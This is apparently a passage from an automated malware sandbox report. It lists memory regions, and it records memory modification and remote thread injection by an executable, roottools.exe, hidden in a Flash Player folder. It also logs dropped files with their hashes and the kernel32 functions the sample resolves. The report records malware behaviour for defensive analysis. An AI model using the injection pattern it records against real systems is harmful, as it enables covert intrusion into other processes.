| profapi.dll | 0x75480000 | 0x7548afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| comctl32.dll | 0x75490000 | 0x7562dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x75630000 | 0x7566afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x75670000 | 0x75685fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x75690000 | 0x75697fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sensapi.dll | 0x756a0000 | 0x756a5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| iphlpapi.dll | 0x756b0000 | 0x756cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rtutils.dll | 0x756d0000 | 0x756dcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winnsi.dll | 0x756e0000 | 0x756e6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x75800000 | 0x7580bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75810000 | 0x7586ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x758c0000 | 0x759bffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x759c0000 | 0x75acffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| psapi.dll | 0x75ad0000 | 0x75ad4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x75ae0000 | 0x75c3bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| iertutil.dll | 0x75c40000 | 0x75e3afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x75e70000 | 0x75f1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wininet.dll | 0x75f20000 | 0x76014fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76020000 | 0x760a2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x760b0000 | 0x7610ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76110000 | 0x761acfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x761b0000 | 0x7623efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| crypt32.dll | 0x76240000 | 0x7635cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msasn1.dll | 0x76360000 | 0x7636bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76370000 | 0x763c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x76570000 | 0x7663bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x76640000 | 0x76685fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| urlmon.dll | 0x76690000 | 0x767c5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x767d0000 | 0x767e8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x767f0000 | 0x767f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76800000 | 0x768effff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x768f0000 | 0x768f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wldap32.dll | 0x76900000 | 0x76944fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x76950000 | 0x769dffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wintrust.dll | 0x76a40000 | 0x76a6cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shell32.dll | 0x76a70000 | 0x776b9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x77740000 | 0x777dffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x777e0000 | 0x77814fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000778b0000 | 0x778b0000 | 0x779a9fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000779b0000 | 0x779b0000 | 0x77acefff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77ad0000 | 0x77c78fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77cb0000 | 0x77e2ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007ef92000 | 0x7ef92000 | 0x7ef94fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ef95000 | 0x7ef95000 | 0x7ef97fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ef98000 | 0x7ef98000 | 0x7ef9afff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ef9b000 | 0x7ef9b000 | 0x7ef9dfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ef9e000 | 0x7ef9e000 | 0x7efa0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efa1000 | 0x7efa1000 | 0x7efa3fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efa4000 | 0x7efa4000 | 0x7efa6fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
|
For performance reasons, the remaining 69 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
| Injection Type | Source Process | Source Os Thread ID | Injection Info | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe | 0x6a8 | address = 0x70000, size = 114688 |
|
1 | |
| Modify Memory | #15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe | 0x6a8 | address = 0x876c4, size = 4 |
|
1 | |
| Modify Memory | #15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe | 0x6a8 | address = 0x877d0, size = 4 |
|
1 | |
| Modify Memory | #15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe | 0x6a8 | address = 0x87d38, size = 4 |
|
1 | |
| Create Remote Thread | #15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe | 0x6a8 | address = 0x795bc |
|
1 |
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\local\temp\cab7a2e.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\temp\tar7a2f.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\temp\cab7a4f.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\temp\tar7a50.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\temp\cab7a70.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\temp\tar7a71.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[1].txt | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\temp\cab85a9.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\temp\tar85b9.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\g[1].txt | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\ew[1].txt | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\jw[1].txt | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\0wqaga[1].txt | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[2].txt | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe | 192.00 KB (196608 bytes) |
MD5:
71c63dd6822598c7f7c7ab4c9ceb6ba9
SHA1: 854db67ad532a4af63443f8e6f684762e3c9efca SHA256: 99d542d87fc15670f0e353e1bcb788ed6cd05dc6464a3b011fa7af206ff6a083 |
|
|
| c:\users\aetadzjz\appdata\local\temp\cab7a2e.tmp | 52.71 KB (53978 bytes) |
MD5:
03f9e1f45c0d5fe8e08af7449ba1fa2f
SHA1: da545c3133a914434cce940bae78d8ad180a529a SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311 |
|
|
| c:\users\aetadzjz\appdata\local\temp\cab7a4f.tmp | 52.71 KB (53978 bytes) |
MD5:
03f9e1f45c0d5fe8e08af7449ba1fa2f
SHA1: da545c3133a914434cce940bae78d8ad180a529a SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311 |
|
|
| c:\users\aetadzjz\appdata\local\temp\cab7a70.tmp | 52.71 KB (53978 bytes) |
MD5:
03f9e1f45c0d5fe8e08af7449ba1fa2f
SHA1: da545c3133a914434cce940bae78d8ad180a529a SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311 |
|
|
| c:\users\aetadzjz\appdata\local\temp\cab85a9.tmp | 52.71 KB (53978 bytes) |
MD5:
03f9e1f45c0d5fe8e08af7449ba1fa2f
SHA1: da545c3133a914434cce940bae78d8ad180a529a SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311 |
|
|
| c:\users\aetadzjz\appdata\local\temp\tar7a2f.tmp | 126.77 KB (129813 bytes) |
MD5:
4479a52b31b6bde89384fb63854ec382
SHA1: 71386477836e4081befb501a266ccc4c984030e0 SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2 |
|
|
| c:\users\aetadzjz\appdata\local\temp\tar7a50.tmp | 126.77 KB (129813 bytes) |
MD5:
4479a52b31b6bde89384fb63854ec382
SHA1: 71386477836e4081befb501a266ccc4c984030e0 SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2 |
|
|
| c:\users\aetadzjz\appdata\local\temp\tar7a71.tmp | 126.77 KB (129813 bytes) |
MD5:
4479a52b31b6bde89384fb63854ec382
SHA1: 71386477836e4081befb501a266ccc4c984030e0 SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2 |
|
|
| c:\users\aetadzjz\appdata\local\temp\tar85b9.tmp | 126.77 KB (129813 bytes) |
MD5:
4479a52b31b6bde89384fb63854ec382
SHA1: 71386477836e4081befb501a266ccc4c984030e0 SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2 |
|
|
| c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[1].txt | 0.27 KB (281 bytes) |
MD5:
7372fbe29d49e31bd4002a12ff10b319
SHA1: b49450a4a7844b312769bd7ae0628aa1f0426efe SHA256: 1e52ee6f27cb7c984dc23b4cd48c641438fcff2a7dc3048b04fedc51476202c4 |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\google_de[1].txt | 48.62 KB (49787 bytes) |
MD5:
5bce4a525f0d6dba211e09b60f144bf9
SHA1: 09f4d50cd2573e52623a19c40d987508d5c09bcb SHA256: eb192368bd6677a889c70e4225d709baa19c2ac38c07c8fe116ff0da59deae00 |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\yylw[1].txt | 0.23 KB (236 bytes) |
MD5:
41f4b78b882df2ab9fdf5c2c60cc7c85
SHA1: 75d27da1d973a5d0bc1f246834e5e22591ca2732 SHA256: 905aa522a93e407c554a064d451edbd8f25f8afb70cbb0ab10d6a553aaeef1b6 |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\a6egg[1].txt | 348.46 KB (356824 bytes) |
MD5:
f7ae0d06a19a33310f2b33a9b91a0916
SHA1: c35f57e13fb999aeb678c8117af70714e5f38e9c SHA256: 2d801bf8ce180123c447ef817c9385c298d1c08fb04a9f49042cd42e9e00f959 |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\qfmq[1].txt | 5.65 KB (5784 bytes) |
MD5:
ff63baf8441314e99b50f8e6205f2df8
SHA1: 1c5e1270872b75f9a1503ddc7bb22532257a8ed9 SHA256: 45b9ee8eb14ffc3692481095527cd8cc889b586f122ab5e43c0bb40ae390ef41 |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\oa[1].txt | 5.65 KB (5784 bytes) |
MD5:
ca0cc8ffcff1a13be2752132a8167d6b
SHA1: 3c0265be2ab965bf0ebf9382717bef9b815bec36 SHA256: 48b849dc7205c10f1daf557ea8e05a633bb9646eb1da5da89aac17c02014c0ad |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\3q2naw[1].txt | 3.15 KB (3224 bytes) |
MD5:
5dee0de1d90631b1fb9a8de697045c67
SHA1: bb4d81d7b0352e350ac345ae367c58cd8049017a SHA256: c4da2e282d7bfa3faf20529d0e97b1baf05c41344e1da97a64e5ad96e1ec96f8 |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\a[1].txt | 156.73 KB (160492 bytes) |
MD5:
f0acdd87a868572d89fe58cc771a4f44
SHA1: e12103983b81e7c4e19c7e432ae0736a028024dd SHA256: 308880082e52bef445ba6ff2ac9fc91bceb550569768d2060114aa14a84a76fb |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\spsra[1].txt | 200.17 KB (204972 bytes) |
MD5:
9cbb4d0e76c226eb847c4ef1a8b0d39c
SHA1: cff19e3d50f60e32157747873ba9e87cb1231de6 SHA256: f000b6a915fa937d682aa56bccc5b1c5c84df5c6de526a2ecb59a3399e4c49d6 |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\q[1].txt | 167.56 KB (171584 bytes) |
MD5:
e00b057f92a763e5b783ca24b94a26ce
SHA1: c3b90637188b48431e1aea880a49393e669a300c SHA256: 998b2fd31f18b2a97a5ab0548f5ea02d71f1f6bf69800e9b2d5b98db16322c2f |
|
|
| c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[2].txt | 0.27 KB (279 bytes) |
MD5:
90de1992ceb330537fee8db14d5fd987
SHA1: b05f7371ddbfc73d7393445bd8d52048289f0a4f SHA256: 6ea48ebb47ac6309a8a5d275563df6aaa2ad1a68f5a26dc2530d9a39ef9dd231 |
|
|
| c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[1].txt | 0.27 KB (278 bytes) |
MD5:
7e2935c87edf38621c63511a6cc5e1e3
SHA1: 148686c9adafa08e6d55351479da7be5b0bcf064 SHA256: d08ddc5f3a9bb51961871f0b0a8c840adb5828c8a986f1a730e330fef876c44f |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\google_de[1].txt | 48.62 KB (49791 bytes) |
MD5:
9b930032eac8c180ed70390aee88903c
SHA1: 843bfe71d4c57d9fe1e0c8d270603ea4bd5f269f SHA256: 888f2001ace08ab500701ae57772967f6b7df6b0c35a5472802077ef81289adb |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\q[1].txt | 0.19 KB (192 bytes) |
MD5:
309cd930b3d4df7998a5aeb8f61ab194
SHA1: 9fe5095d059406cd2f92d58b9ac148cd5897450c SHA256: fa3faba658be48400f8847bcf6f792362fbfd422ef8f80ba31ba4b02f346e609 |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\a[1].txt | 36.40 KB (37272 bytes) |
MD5:
3ecca40e5dc9f0107f5d9ae500177878
SHA1: 947876a5a40257ba6da4021ad4bc8b5317dbdd03 SHA256: 5947ddcc53d38842b7e5bf1aaab70822f2982fe1859183304c2ebd3e5d2f72f0 |
|
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\roaming\microsoft\windows\ietldcache\index.dat | 256.00 KB (262144 bytes) |
MD5:
8ed682d01fa076cced515bf6b21ba022
SHA1: e69667b35d101d9cd052697da198c40a88e16e74 SHA256: 4abb12ce35853bda9c190e84a3329ab50701e035b92436eba8f4ddf9b96e4e6c |
|
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x759d7a2f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x759d49d7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x759d89b3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77cf1f6e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x759e10b5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x759d34d5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77cde026 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x759d35b7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x759ed9b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x759d2d3c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77ce45f5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x759ddd0e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x759d14e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x759d5a7e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x759fd4c4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x759d103d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x759d170d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x759d1400 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x759d5a96 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFreeEx, address_out = 0x759ed9c8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x759fd075 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x759ed5cd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenMutexW, address_out = 0x759d5151 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x759ece2e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x759d17ec |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x759d469b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RemoveVectoredExceptionHandler, address_out = 0x77d25f41 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x759d1809 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x759d1b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x759d1ae5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x759d1886 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x759d1245 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = AddVectoredExceptionHandler, address_out = 0x77d2742b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x759d7a10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x759d11f8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x759f830d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x759d3e8e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x759d195e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstChangeNotificationW, address_out = 0x759ed851 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextChangeNotification, address_out = 0x759f5c1e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessInJob, address_out = 0x759fc7ea |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateRemoteThread, address_out = 0x75a5416b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateNamedPipeW, address_out = 0x75a5414b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x75a541df |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ConnectNamedPipe, address_out = 0x75a540fb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x759d5371 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x759d418b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultUILanguage, address_out = 0x759d44ab |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x759f3b92 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x759d1b48 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x759d17d1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x77ce2c42 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x759d465a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x759d192e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x759ed4f7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeNameForVolumeMountPointW, address_out = 0x759e052f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x759d1986 |
|
1 | |
